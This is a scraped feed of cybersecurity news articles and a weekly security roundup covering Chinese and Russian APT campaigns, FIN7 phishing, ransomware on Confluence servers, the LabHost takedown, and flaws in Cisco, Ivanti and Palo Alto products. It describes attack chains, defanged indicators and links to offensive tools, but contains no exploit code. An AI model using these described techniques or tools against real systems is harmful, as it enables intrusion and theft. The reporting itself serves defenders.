Normal view
Akira Ransomware Gang Extorts $42 Million; Now Targets Linux Servers
FBI chief says China is preparing to attack US critical infrastructure
China-linked threat actors are preparing cyber attacks against U.S. critical infrastructure warned FBI Director Christopher Wray.
FBI Director Christopher Wray warned this week that China-linked threat actors are preparing an attack against U.S. critical infrastructure, Reuters reported.
According to the FBI chief, the Chinese hackers are waiting “for just the right moment to deal a devastating blow.”
In February, US CISA, the NSA, the FBI, along with partner Five Eyes agencies, published a joint advisory to warn that China-linked APT Volt Typhoon infiltrated a critical infrastructure network in the US and remained undetected for at least five years.
“the U.S. authoring agencies have recently observed indications of Volt Typhoon actors maintaining access and footholds within some victim IT environments for at least five years,” reads the alert.
The Volt Typhoon group has been active since at least mid-2021 it carried out cyber operations against critical infrastructure. In the most recent campaign, the group targeted organizations in the communications, manufacturing, utility, transportation, construction, maritime, government, information technology, and education sectors.
The APT group is using almost exclusively living-off-the-land techniques and hands-on-keyboard activity to evade detection.
In December 2023, Microsoft first noticed that to conceal malicious traffic, the threat actor routes it through compromised small office and home office (SOHO) network devices, including routers, firewalls, and VPN hardware. The group also relies on customized versions of open-source tools for C2 communications and to stay under the radar.
The Chinese cyberespionage group has successfully breached the networks of multiple US critical infrastructure organizations. Most of the impacted organizations are in the Communications, Energy, Transportation Systems, and Water and Wastewater Systems sectors.
“The group also relies on valid accounts and leverage strong operational security, which combined, allows for long-term undiscovered persistence. In fact, the U.S. authoring agencies have recently observed indications of Volt Typhoon actors maintaining access and footholds within some victim IT environments for at least five years.” continues the alert. “Volt Typhoon actors conduct extensive pre-exploitation reconnaissance to learn about the target organization and its environment; tailor their tactics, techniques, and procedures (TTPs) to the victim’s environment; and dedicate ongoing resources to maintaining persistence and understanding the target environment over time, even after initial compromise.”
U.S. agencies fear the possibility that these actors could gain access to the networks of critical infrastructure to cause disruptive effects in the event of potential geopolitical tensions and/or military conflicts.
The Volt Typhoon’s activities suggest that the group primarily aims to establish a foothold within networks to secure access to Operational Technology (OT) assets.
The US agencies also released a technical guide containing recommendations to identify and mitigate living off the land techniques adopted by the APT group.
A Chinese Foreign Ministry spokesperson recently stated that the Volt Typhoon activity is not associated with Beijing, but linked it to a cybercrime operation.
Wray confirmed that Volt Typhoon’s campaign is still ongoing and breached numerous American companies in telecommunications, energy, water and other critical sectors.
The state-sponsored hackers also targeted 23 pipeline operators, Wray revealed during a speech at Vanderbilt Summit on Modern Conflict and Emerging Threats.
The FBI Director remarked that China is developing the “ability to physically wreak havoc on US critical infrastructure at a time of its choosing,” “Its plan is to land low blows against civilian infrastructure to try to induce panic.”
Wray explained that it is difficult to determine the purpose behind the cyber pre-positioning, however, the activity is part of a broader strategy to dissuade the U.S. from defending Taiwan.
Wray added that the China-linked actors employed a series of botnets in their activities.
In December, the Black Lotus Labs team at Lumen Technologies linked a small office/home office (SOHO) router botnet, tracked as KV-Botnet to the operations of China-linked threat actor Volt Typhoon. The botnet is comprised of two complementary activity clusters, the experts believe it has been active since at least February 2022. The threat actors target devices at the edge of networks.
The KV-Botnet is composed of end-of-life products used by SOHO devices. In early July and August of 2022, the researchers noticed several Cisco RV320s, DrayTek Vigor routers, and NETGEAR ProSAFEs that were part of the botnet. Later, in November 2022, most of the devices composing the botnet were ProSAFE devices, and a smaller number of DrayTek routers. In November 2023, the experts noticed that the botnet started targeting Axis IP cameras, such as the M1045-LW, M1065-LW, and p1367-E.
The researchers pointed out that the use of the KV-Botnet is limited to China-linked actors. Thus far the victimology aligns primarily with a strategic interest in the Indo-Pacific region, the experts observed a focus on ISPs and government organizations.
About the author: Pierluigi Paganini
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, China)
United Nations Development Programme (UNDP) investigates data breach
The United Nations Development Programme (UNDP) has initiated an investigation into an alleged ransomware attack and the subsequent theft of data.
The United Nations Development Programme (UNDP) is investigating an alleged ransomware attack that resulted in data theft.
The United Nations Development Programme (UNDP) is a United Nations agency tasked with helping countries eliminate poverty and achieve sustainable economic growth and human development.
The cyber attack recently targeted the IT infrastructure of the Agency in UN City, Copenhagen.
On March 27, UNDP became aware that a data-extortion threat actor had stolen data, including human resources and procurement information.
“On March 27, UNDP received a threat intelligence notification that a data-extortion actor had stolen data which included certain human resources and procurement information.” reads the statement published by the Agency. “Actions were immediately taken to identify a potential source and contain the affected server as well as to determine the specifics of the exposed data and who was impacted.”
UNDP is investigating the security incident to determine the scope of the cyberattack. The agency is keeping individuals affected by the breach updated and sharing information with other stakeholders, including its partners across the UN system.
“UNDP takes this incident extremely seriously and we reiterate our dedication to data security. We are committed to continue working to detect and minimize the risk of cyber-attacks.” continues the statement.
UNDP did not share details about the attack, however, on March 27, 2024, the ransomware group 8base added the agency to its Tor leak site (the Tor leak site is unavailable at the time of this writing).
The extortion group as yet to publish the stolen data.
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, United Nations Development Programme)
Hackers Target Middle East Governments with Evasive "CR4T" Backdoor
FIN7 targeted a large U.S. carmaker with phishing attacks
BlackBerry reported that the financially motivated group FIN7 targeted the IT department of a large U.S. carmaker with spear-phishing attacks.
In late 2023, BlackBerry researchers spotted the threat actor FIN7 targeting a large US automotive manufacturer with a spear-phishing campaign. FIN7 targeted employees who worked in the company’s IT department and had higher levels of administrative rights.
The attackers employed the lure of a free IP scanning tool to infect the systems with the Anunak backdoor and gain an initial foothold using living-off-the-land binaries, scripts, and libraries (lolbas).
FIN7 is a Russian criminal group (aka Carbanak) that has been active since mid-2015, it focuses on restaurants, gambling, and hospitality industries in the US to harvest financial information that was used in attacks or sold in cybercrime marketplaces.
Fin7 was observed using the PowerShell script POWERTRASH, which is a custom obfuscation of the shellcode invoker in PowerSploit.
In the attacks analyzed by BlackBarry, threat actors used a typosquatting technique, they used a malicious URL “advanced-ip-sccanner[.]com” masquerading as the legitimate website “advanced-ip-scanner[.]com”, which is a free online scanner.
Upon visiting the rogue site, visitors are redirected to “myipscanner[.]com”, which in turn redirected them to an attacker-owned Dropbox that downloaded the malicious executable WsTaskLoad.exe onto their systems.
Upon execution, the executable initiates a complex multi-stage process comprising DLLs, WAV files, and shellcode execution. This process culminates in the loading and decryption of a file called ‘dmxl.bin,’ which contains the Anunak payload.
The threat actors used WsTaskLoad.exe to install OpenSSH to maintain persistence, they used scheduled task to persist OpenSSH on the victim’s machine.
While historical data demonstrate that FIN7 often employs OpenSSH for lateral movement, no such activity was detected in this particular campaign. OpenSSH is also used for external access.
“While the tactics, techniques, and procedures (TTPs) involved in this campaign have been well documented over the past year, the OpenSSH proxy servers utilized by the attackers have not been disseminated.” concludes the report that also includes recommendations for Mitigation and IoCs (Indicators of Compromise). “BlackBerry thinks it prudent to enable individuals and entities to also identify these hosts and protect themselves.”
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, FIN7)
Law enforcement operation dismantled phishing-as-a-service platform LabHost
An international law enforcement operation led to the disruption of the prominent phishing-as-a-service platform LabHost.
An international law enforcement operation, codenamed Nebulae and coordinated by Europol, led to the disruption of LabHost, which is one of the world’s largest phishing-as-a-service platforms.
Law enforcement from 19 countries participated in the operation which resulted in the arrest of 37 individuals.
The phishing-as-a-service platform was available on the clear web and has been shut down by the police.
Between April 14th and April 17th, law enforcement agencies conducted searches at 70 addresses worldwide, leading to the arrest of the suspects. Four individuals, including the original developer of LabHost, were arrested in the United Kingdom.
Phishing as a service (PaaS) platforms provide phishing tools and resources to crooks, often for a fee or subscription. These tools typically include pre-designed phishing templates, email or text message sending capabilities, website hosting services for phishing pages. Most important PhaaS platforms also provide technical support to their customers.
LabHost was a prominent tool for cybercriminals globally, offering a subscription-based service that facilitated phishing attacks. The platform provided phishing kits, hosting infrastructure, interactive features for engaging victims, and campaign management tools. The investigation conducted by law enforcement revealed approximately 40,000 phishing domains associated with LabHost, which reached 10,000 users worldwide. Subscribers paid an average monthly fee of $249 for use the platform’s services. LabHost offered a selection of over 170 convincing fake websites for users to deploy with ease.
“What made LabHost particularly destructive was its integrated campaign management tool named LabRat. This feature allowed cybercriminals deploying the attacks to monitor and control those attacks in real time. LabRat was designed to capture two-factor authentication codes and credentials, allowing the criminals to bypass enhanced security measures.” reads the announcement published by Europol
Australian police arrested five individuals across the country as part of the operation, the authorities reported that more than 94,000 people in Australia were victims of the attacks launched through the platform.
“Australian offenders are allegedly among 10,000 cybercriminals globally who have used the platform, known as LabHost, to trick victims into providing their personal information, such as online banking logins, credit card details and passwords, through persistent phishing attacks sent via texts and emails.” reported the AFP.
“As a result of the Australian arm of the investigation, led by the AFP’s Joint Policing Cybercrime Coordination Centre (JCP3), more than 200 officers from the AFP and state and territory police were yesterday (17 April, 2024) involved in executing 22 search warrants across five states. This included 14 in Victoria, two in Queensland, three in NSW, one in South Australia and two in Western Australia. A Melbourne man and an Adelaide man, who police will allege were LabHost users, were arrested during the warrants and charged with cybercrime-related offences. Three Melbourne men were also arrested by Victoria Police and charged with drug-related offences.”
The U.K. Metropolitan Police said LabHost’s sites have ensnared approximately 70,000 victims in the UK alone. On a global scale, the service has acquired 480,000 card numbers, 64,000 PIN numbers, and over one million passwords for various online services. The actual number of victims is anticipated to surpass current estimates, with ongoing efforts focused on identifying and assisting as many affected individuals as feasible.
Operators behind the PhaaS received about £1 million in payments from criminal users since its launch.
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, PhaaS)
OfflRouter Malware Evades Detection in Ukraine for Almost a Decade
FIN7 Cybercrime Group Targeting U.S. Auto Industry with Carbanak Backdoor
Recover from Ransomware in 5 Minutes—We will Teach You How!
New Android Trojan 'SoumniBot' Evades Detection with Clever Tricks
How to Conduct Advanced Static Analysis in a Malware Sandbox
- The Hacker News
- Global Police Operation Disrupts 'LabHost' Phishing Service, Over 30 Arrested Worldwide
Global Police Operation Disrupts 'LabHost' Phishing Service, Over 30 Arrested Worldwide
Previously unknown Kapeka backdoor linked to Russian Sandworm APT
Russia-linked APT Sandworm employed a previously undocumented backdoor called Kapeka in attacks against Eastern Europe since 2022.
WithSecure researchers identified a new backdoor named Kapeka that has been used in attacks targeting victims in Eastern Europe since at least mid-2022. The backdoor is very sophisticated, it serves as both an initial toolkit and as a backdoor for maintaining long-term access to compromised systems. The nature of the targets, low detection rate, and sophisticated malware-supported features suggest that an APT group developed it.
WithSecure noticed overlaps between Kapeka and GreyEnergy and the Prestige ransomware attacks which are attributed to the Russia-linked Sandworm APT group. WithSecure believes that Kapeka is likely part of the Sandworm’s arsenal.
The Sandworm group (aka BlackEnergy, UAC-0082, Iron Viking, Voodoo Bear, and TeleBots) has been active since 2000, it operates under the control of Unit 74455 of the Russian GRU’s Main Center for Special Technologies (GTsST). The group is also the author of the NotPetya ransomware that hit hundreds of companies worldwide in June 2017. In 2022, the Russian APT used multiple wipers in attacks aimed at Ukraine,including AwfulShred, CaddyWiper, HermeticWiper, Industroyer2, IsaacWiper, WhisperGate, Prestige, RansomBoggs, and ZeroWipe.
“Kapeka contains a dropper that will drop and launch a backdoor on a victim’s machine and then remove itself. The backdoor will first collect information and fingerprint both the machine and user before sending the details on to the threat actor.” states WithSecure. “This allows tasks to be passed back to the machine or the backdoor’s configuration to be updated. WithSecure do not have insight as to how the Kapeka backdoor is propagated by Sandworm.”
The researcher speculates that Kapeka is a successor to GreyEnergy, which itself was likely a replacement for BlackEnergy in Sandworm.
Kapeka includes a dropper that acts as a launcher for a backdoor component on the infected host, after which it removes itself. The dropper also sets up persistence for the backdoor through a scheduled task (if admin or SYSTEM) or autorun registry (if not).
The Kapeka backdoor is a Windows DLL, which has a single exported function. The malware masqueraded as a Microsoft Word Add-In (.wll) file. It is written in C++ and compiled with Visual Studio 2017 (15.9). Upon execution, it requires the “-d” argument in the initial run but not for subsequent executions. The malware has a multi-threaded implementation, utilizing event objects for thread synchronization and signaling.
The backdoor employs the WinHttp 5.1 COM interface (winhttpcom.dll) for its network communication module. It interacts with its C2 server to fetch tasks and relay fingerprinted data and task outcomes. The malware uses JSON for C2 communication. Two distinct threads manage network communication: one for sending fingerprinted data and fetching tasks, and another for transmitting completed task results to the C2. Both threads utilize the same request/response mechanism.
The backdoor can update its C2 configuration dynamically by receiving a new JSON configuration (with the key “GafpPS”) from the C2 server during polling. If the received configuration differs from the current one, the backdoor updates its configuration on-the-fly and stores the latest C2 configuration in the registry value (“Seed”). The backdoor can also perform various tasks on the infected system by receiving a list of tasks as a JSON response (with the key “Td7opP”) from its C2 server during polling. The malicious code spawns a separate thread to execute each task.
“The backdoor’s victimology, infrequent sightings, and level of stealth and sophistication indicate APT-level activity, highly likely of Russian origin. However, due to sparsity of data at the time of writing the infection vector, the threat actor, and the actor’s ‘actions on objectives’ cannot be conclusively stated. Nevertheless, we examined multiple data points that strongly suggests a link between Kapeka and Sandworm”
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, Sandworm)
- Security Affairs
- Cisco warns of a command injection escalation flaw in its IMC. PoC publicly available
Cisco warns of a command injection escalation flaw in its IMC. PoC publicly available
Cisco has addressed a high-severity vulnerability in its Integrated Management Controller (IMC) for which publicly available exploit code exists.
Cisco has addressed a high-severity Integrated Management Controller (IMC) vulnerability and is aware of a public exploit code for this issue. The PoC exploit code allows a local attacker to escalate privileges to root.
Cisco Integrated Management Controller (IMC) is a baseboard management controller (BMC) that provides embedded server management for Cisco UCS C-Series Rack Servers and Cisco UCS S-Series Storage Servers.
The vulnerability, tracked as CVE-2024-20295, resides in the CLI of the Cisco Integrated Management Controller (IMC). A local, authenticated attacker can exploit the vulnerability to conduct command injection attacks on the underlying operating system and elevate privileges to root. The IT giant reported that to exploit this vulnerability, the attacker must have read-only or higher privileges on an affected device.
“This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted CLI command. A successful exploit could allow the attacker to elevate privileges to root.” reads the advisory.
The flaw impacts the following products if they are running a vulnerable release of Cisco IMC in the default configuration:
- 5000 Series Enterprise Network Compute Systems (ENCS)
- Catalyst 8300 Series Edge uCPE
- UCS C-Series Rack Servers in standalone mode
- UCS E-Series Servers
The IT giant devices that are based on a preconfigured version of a UCS C-Series Server are also impacted by this flaw if they expose access to the IMC CLI.
The company states that there are no workarounds to solve this vulnerability.
The Cisco PSIRT is aware that proof-of-concept exploit code is available for this vulnerability, however it is not aware of attacks in the wild exploiting it.
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, PoC exploit)
Hackers Exploit OpenMetadata Flaws to Mine Crypto on Kubernetes
Malicious Google Ads Pushing Fake IP Scanner Software with Hidden Backdoor
Linux variant of Cerber ransomware targets Atlassian servers
Threat actors are exploiting the CVE-2023-22518 flaw in Atlassian servers to deploy a Linux variant of Cerber (aka C3RB3R) ransomware.
At the end of October 2023, Atlassian warned of a critical security flaw, tracked as CVE-2023-22518 (CVSS score 9.1), that affects all versions of Confluence Data Center and Server.
The vulnerability is an improper authorization issue that can lead to significant data loss if exploited by an unauthenticated attacker.
Cado Security Labs recently became aware that Cerber ransomware is being deployed into Confluence servers via the CVE-2023-22518 exploit. The experts pointed out that there is very little knowledge about the Linux variant of the ransomware family.
Cerber has been active since at least 2016, most recently it was involved in attacks against Confluence servers.
The malware includes three heavily obfuscated C++ payloads compiled as 64-bit Executable and Linkable Format (ELF) files and packed with UPX. UPX is a widely-used packer among threat actors, enabling the storage of encoded program code within the binary. At runtime, the code is extracted in memory and executed, a process known as “unpacking,” to evade detection by security software.
Attackers exploited this vulnerability to gain initial access to vulnerable Atlassian instances.
“We have observed instances of the Cerber ransomware being deployed after an attacker leveraged CVE-2023-22518 in order to gain access to vulnerable instances of Confluence. It is a fairly recent improper authorization vulnerability that allows an attacker to reset the Confluence application and create a new administrator account using an unprotected configuration restore endpoint used by the setup wizard.” states Cado Security.
Financially motivated threat actors created an admin account to deploy the Effluence web shell plugin and execute arbitrary commands on the vulnerable server.
The attackers use the web shell to download and run the primary Cerber payload.
“In a default install, the Confluence application is executed as the “confluence” user, a low privilege user. As such, the data the ransomware is able to encrypt is limited to files owned by the confluence user. It will of course succeed in encrypting the datastore for the Confluence application, which can store important information.” continues the report. “If it was running as a higher privilege user, it would be able to encrypt more files, as it will attempt to encrypt all files on the system.”
The payload is written in C++ and is highly obfuscated, and packed with UPX. The researchers pointed out that it serves as a stager for further payloads, the malware uses a C2 server at 45[.]145[.]6[.]112 to download and unpack further payloads. Upon execution, the malicious code can delete itself from the disk.
Upon execution, the malware unpacks itself, and tries to create a file at /var/lock/0init-ld.lo.
It then connects to the (now defunct) C2 server at 45[.]145[.]6[.]112 and fetches a log checker known internally as agttydck.
Upon executing the “agttydck.bat” the encryptor payload “agttydcb.bat” is downloaded and executed by the primary payload.
The agttydck malware, written in C++ and packed with UPX, performs several malicious actions: it logs activity in “/tmp/log.0” at startup and “/tmp/log.1” at completion, searches the root directory for encryptable directories, drops a ransom note in each directory, and encrypts all files, appending a “.L0CK3D” extension.
“Cerber is a relatively sophisticated, albeit aging, ransomware payload. While the use of the Confluence vulnerability allows it to compromise a large amount of likely high value systems, often the data it is able to encrypt will be limited to just the confluence data and in well configured systems this will be backed up. This greatly limits the efficacy of the ransomware in extracting money from victims, as there is much less incentive to pay up.” concludes the report that also includes Indicators of compromise (IoCs).
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, Cerber ransomware)
Last Week in Security (LWiS) - 2024-04-16
Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2024-04-08 to 2024-04-16.
News
- Google Public Sector achieves Top Secret and Secret cloud authorization - Google has entered the chat. With Microsoft's recent APT issues, I wonder if any any orgs will consider Google.
- Muddled Libra's Evolution to the Cloud - Unit 42 researchers discovered that the Muddled Libra group now actively targets software-as-a-service (SaaS) applications and cloud service provider (CSP) environments.
- Toward greater transparency: Adopting the CWE standard for Microsoft CVEs - "...we will now publish root cause data for Microsoft CVEs using the Common Weakness Enumeration (CWE™) industry standard."
- Our Response to Hashicorp's Cease and Desist Letter - Some turmoil in the IaC world. "The OpenTofu team vehemently disagrees with any suggestion that it misappropriated, mis-sourced, or otherwise misused HashiCorp's BSL code. All such statements have zero basis in facts."
- Amazon CloudFront now supports Origin Access Control (OAC) for Lambda function URL origins - Let your cloud teams know!
- [PDF] KONA BLU - Declassified DHS project - KONA BLUE - A special access program for recovering materials user for inter dimensional, time, and space travel. While the project only was a SAP for 6 months and seems like it [PDF] never really did anything a look into what goes into a SAP is interesting and the first example being declassified we are aware of.
- Microsoft will add External Recipient Rate email limits to Exchange Online in January 2025 - The paywalls continue, this is a push for more revenue from the Azure email service. This could impact your bulk phishing engagements if you're using exchange as your mail sender and send to more than 2,000 recipients a day.
- Twitter's Clumsy Pivot to X.com Is a Gift to Phishers - Rewriting URLs is a dangerous game.
- Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400) - This is being actively exploited in the wild, and is this month's SSLVPN RCE...
Techniques and Write-ups
- Using Microsoft Dev Tunnels for C2 Redirection - Using dev tunnels as your C2. Careful with burning your Microsoft account.
- CS Technologies — Evolution Vulnerabilities - A set of vulnerabilities within software used to administer the EVO2 and EVO4 door access controllers. Chained together, this leads to unauthenticated access to add a user with access to every door in the building, control doors, etc.
- A trick, the story of CVE-2024-26230 - A step-by-step walkthrough of CVE-2024-26230 (use-after-free vulnerability in the telephony service)
- We discovered an AWS access vulnerability - A vulnerability in AWS STS allowed users to gain unauthorized account access due to incorrect role trust policy evaluations. It's been patched! Cool to read that this SaaS has a different AWS account per customer as a security boundary.
- Resolving Stack Strings with Capstone Disassembler & Unicorn in Python - Walkthrough on how to resolve stack strings in malware using Capstone Disassembler and Unicorn Emulator in Python. They used Conti Ransomware to showcase it.
- Chaining N-days to Compromise All: Part 3 — Windows Driver LPE: Medium to System - This post discusses the exploitation of a logic bug in the Windows kernel driver mskssrv.sys (CVE-2023-29360), which was demonstrated in Pwn2Own 2023. The exploit allows priv-esc from user to SYSTEM by manipulating the Memory Descriptor List (MDL) to map physical memory addresses incorrectly, effectively bypassing security checks. It was part of this crazy VM escape chain.
- Rooting out Risky SCCM Configs with Misconfiguration Manager - The SpecterOps team has published a script for sysadmins and infosec practitioners to identify every TAKEOVER and ELEVATE attack in Misconfiguration-Manager. SCCM is an overlooked attack surface that usually holds a privileged position in the AD network.
- Understanding ETW Patching - A quick summary from @jsecurity101 on how function patching can be applied to ETW providers to alter or inhibit their standard behavior, potentially evading detection by modifying or bypassing function execution in both user-mode and kernel-mode operations.
- CreateRCE — Yet Another Vulnerability in CreateUri In another episode of Akamai vs Outlook clients... "An attacker on the internet can trigger the vulnerability against Outlook clients without any user interaction (zero-click)". The technical write-up of CVE-2023-35628 which was patched December 2023.
- Sysrv Infection (Linux Edition) - Write up of the Sysrv botnet, which deployed a crypto miner on a Linux system using a payload pulled down from a specified URL. Sometimes detecting these can be as easy as checking those DNS logs for known mining pools.
- My Journey on Integrating Sliver into Mythic - Mythic agents that use Mythic's API and Sliver's API to remotely control Sliver agents from within Mythic!
- How I Leveraged WMI to Enumerate a Process Modules and Their Base Addresses - "Leverage Windows Management Instrumentation (WMI) to extract the loaded modules of a specific process and understand how to get each module base address, show the advantages and the ability to perform ShellCode injection in .text section directly."
- Why you shouldn't use a commercial VPN: Amateur hour with Windscribe - If you are going to use a commercial VPN, at least generate standard WireGuard or OpenVPN configs and use the industry standard apps. This is why.
- Flaw in PuTTY P-521 ECDSA signature generation leaks SSH private keys - "An attacker who compromises an SSH server may be able to leverage this vulnerability to compromise the user's private key. Attackers may also be able to compromise the SSH private keys of anyone who used git+ssh with commit signing and a P-521 SSH key, simply by collecting public commit signatures." Cryptography is hard!
Tools and Exploits
- UserManagerEoP - PoC for CVE-2023-36047. Patched last week. Should still be viable if you're on an engagement right now!
- Gram - Klarna's own threat model diagramming tool
- Shoggoth - Shoggoth is an open-source project based on C++ and asmjit library used to encrypt given shellcode, PE, and COFF files polymorphically.
- ExploitGSM - Exploit for 6.4 - 6.5 Linux kernels and another exploit for 5.15 - 6.5. Zero days when published.
- Copilot-For-Security - Microsoft Copilot for Security is a generative AI-powered security solution that helps increase the efficiency and capabilities of defenders to improve security outcomes at machine speed and scale, while remaining compliant to responsible AI principles
- CVE-2024-21378 - DLL code for testing CVE-2024-21378 in MS Outlook. Using this with Ruler.
- ActionsTOCTOU - Example repository for GitHub Actions Time of Check to Time of Use (TOCTOU vulnerabilities).
- obfus.h - obfus.h is a macro-only library for compile-time obfuscating C applications, designed specifically for the Tiny C (tcc). It is tailored for Windows x86 and x64 platforms and supports almost all versions of the compiler.
- Wareed DNS C2 is a Command and Control (C2) that utilizes the DNS protocol for secure communications between the server and the target. Designed to minimize communication and limit data exchange, it is intended to be a first-stage C2 to persist in machines that don't have access to the internet via HTTP/HTTPS, but where DNS is allowed.
New to Me and Miscellaneous
This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!
- Can you hack your government? - A list of governments with Vulnerability Disclosure Policies.
- GoAlert - Open source on-call scheduling, automated escalations, and notifications so you never miss a critical alert
- AssetViz - AssetViz simplifies the visualization of subdomains from input files, presenting them as a coherent mind map. Ideal for penetration testers and bug bounty hunters conducting reconnaissance, AssetViz provides intuitive insights into domain structures for informed decision-making.
- GMER - the art of exposing Windows rootkits in kernel mode - GMER is an anti-rootkit tool used to detect and combat rootkits, specifically focusing on the prevalent kernel mode rootkits, and remains effective despite many anti-rootkits losing relevance with advancements in Windows security.
- AiTM Phishing with Azure Functions - The deployment of a serverless AiTM phishing toolkit using Azure Functions to phish Entra ID credentials and cookies
- orange - Orange Meets is a demo application built using Cloudflare Calls. To build your own WebRTC application using Cloudflare Calls. Combine this with some OpenVoice or Real-Time-Voice-Cloning. Scary.
- awesome-secure-defaults - Share this with your development teams and friends or use it in your own tools. "Awesome secure by default libraries to help you eliminate bug classes!"
- NtWaitForDebugEvent + WaitForMultipleObjects - Using these two together to wait for debug events from multiple debugees at once.
- taranis-ai - Taranis AI is an advanced Open-Source Intelligence (OSINT) tool, leveraging Artificial Intelligence to revolutionize information gathering and situational analysis.
- MSFT_DriverBlockList - Repository of Microsoft Driver Block Lists based off of OS-builds.
- HSC24RedTeamInfra - Slides and Codes used for the workshop Red Team Infrastructure Automation at HackSpanCon2024.
- SuperMemory - Build your own second brain with supermemory. It's a ChatGPT for your bookmarks. Import tweets or save websites and content using the chrome extension.
- Kubenomicon - An open source offensive security focused threat matrix for kubernetes with an emphasis on walking through how to exploit each attack.
Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.
Russian APT Deploys New 'Kapeka' Backdoor in Eastern European Attacks
GenAI: A New Headache for SaaS Security Teams
Ivanti fixed two critical flaws in its Avalanche MDM
Ivanti addressed two critical vulnerabilities in its Avalanche mobile device management (MDM) solution, that can lead to remote command execution.
Ivanti addressed multiple flaws in its Avalanche mobile device management (MDM) solution, including two critical flaws, tracked as CVE-2024-24996 and CVE-2024-29204, that can lead to remote command execution.
The MDM software allows administrators to configure, deploy, update, and maintain up to 100,000 mobile IT assets all in one system.
Below is the description for the two vulnerabilities:
- CVE-2024-24996 (CVSS score 9.8) – A Heap overflow vulnerability in WLInfoRailService component of Ivanti Avalanche before 6.4.3 allows an unauthenticated remote attacker to execute arbitrary commands.
- CVE-2024-29204 (CVSS score 9.8) – A Heap Overflow vulnerability in WLAvalancheService component of Ivanti Avalanche before 6.4.3 allows a remote unauthenticated attacker to execute arbitrary commands
A remote attacker can exploit both issues to execute code without user interaction.
Ivanti also addressed tens of medium and high-severity vulnerabilities that could be exploited to trigger denial-of-service conditions, execute arbitrary commands, carry out remote code execution attacks and read sensitive information from memory.
The software company is not aware of attacks in the wild exploiting one of these vulnerabilities at the time of disclosure.
The company addressed the vulnerability with the release of Avalanche 6.4.3.
“To address the security vulnerabilities listed below, it is highly recommended to download the Avalanche installer and update to the latest Avalanche 6.4.3. The installation will apply a fix for each CVE listed in the table below. These vulnerabilities affect any older versions of Avalanche. You can download the latest Avalanche 6.4.3 release here.” reads the advisory.
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, Avalanche mobile device management)
Critical Atlassian Flaw Exploited to Deploy Linux Variant of Cerber Ransomware
Hackers Exploit Fortinet Flaw, Deploy ScreenConnect, Metasploit in New Campaign
Cisco Warns of Global Surge in Brute-Force Attacks Targeting VPN and SSH Services
Researchers released exploit code for actively exploited Palo Alto PAN-OS bug
Researchers released an exploit code for the actively exploited vulnerability CVE-2024-3400 in Palo Alto Networks’ PAN-OS.
Researchers at watchTowr Labs have released a technical analysis of the vulnerability CVE-2024-3400 in Palo Alto Networks’ PAN-OS and a proof-of-concept exploit that can be used to execute shell commands on vulnerable firewalls.
CVE-2024-3400 (CVSS score of 10.0) is a critical command injection vulnerability in Palo Alto Networks PAN-OS software. An unauthenticated attacker can exploit the flaw to execute arbitrary code with root privileges on affected firewalls. This flaw impacts PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both) and device telemetry enabled.
Palo Alto Networks and Unit 42 are investigating the activity related to CVE-2024-3400 PAN-OS flaw and discovered that threat actors have been exploiting it since March 26, 2024.
The researchers are tracking this cluster of activity, conducted by an unknown threat actor, under the name Operation MidnightEclipse.
“Palo Alto Networks is aware of malicious exploitation of this issue. We are tracking the initial exploitation of this vulnerability under the name Operation MidnightEclipse, as we assess with high confidence that known exploitation we’ve analyzed thus far is limited to a single threat actor.” reads the report. “We also assess that additional threat actors may attempt exploitation in the future.”
Upon exploiting the flaw, the threat actor was observed creating a cronjob that would run every minute to access commands hosted on an external server that would execute via bash.
The researchers were unable to access the commands executed by the attackers, however, they believe threat actors attempted to deploy a second Python-based backdoor on the vulnerable devices.
Researchers at cybersecurity firm Volexity referred this second Python backdor as UPSTYLE.
The threat actor, tracked by Volexity as UTA0218, remotely exploited the firewall device to establish a reverse shell and install additional tools. Their primary objective was to extract configuration data from the devices and then use it as a foothold to expand laterally within the targeted organizations.
Now watchTowr Labs released another detection artifact generator tool in the form of an HTTP request
“As we can see, we inject our command injection payload into the SESSID cookie value – which, when a Palo Alto GlobalProtect appliance has telemetry enabled – is then concatenated into a string and ultimately executed as a shell command.” reads the analysis published by watchTowr Labs.
“Something-something-sophistication-levels-only-achievable-by-a-nation-state-something-something.”
Justin Elze, CTO at TrustedSec, also published the exploit used in attacks in the wild.
This week, US CISA added the vulnerability CVE-2024-3400 to its Known Exploited Vulnerabilities (KEV) catalog, ordering U.S. federal agencies to address it by April 19th.
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, PAN-OS)
Cisco warns of large-scale brute-force attacks against VPN and SSH services
Cisco Talos warns of large-scale brute-force attacks against a variety of targets, including VPN services, web application authentication interfaces and SSH services.
Cisco Talos researchers warn of large-scale credential brute-force attacks targeting multiple targets, including Virtual Private Network (VPN) services, web application authentication interfaces and SSH services since at least March 18, 2024.
Below is a list of known affected services:
- Cisco Secure Firewall VPN
- Checkpoint VPN
- Fortinet VPN
- SonicWall VPN
- RD Web Services
- Miktrotik
- Draytek
- Ubiquiti
Successful brute-force attacks can result in unauthorized network access, account lockouts, or denial-of-service (DoS) conditions.
These attacks originate from TOR exit nodes and anonymizing tunnels and proxies, such as:
- VPN Gate
- IPIDEA Proxy
- BigMama Proxy
- Space Proxies
- Nexus Proxy
- Proxy Rack
“The brute-forcing attempts use generic usernames and valid usernames for specific organizations. The targeting of these attacks appears to be indiscriminate and not directed at a particular region or industry.” reads the advisory published by Cisco Talos.
The malicious activity lacks a specific focus on particular industries or regions, suggesting a broader strategy of random, opportunistic attacks.
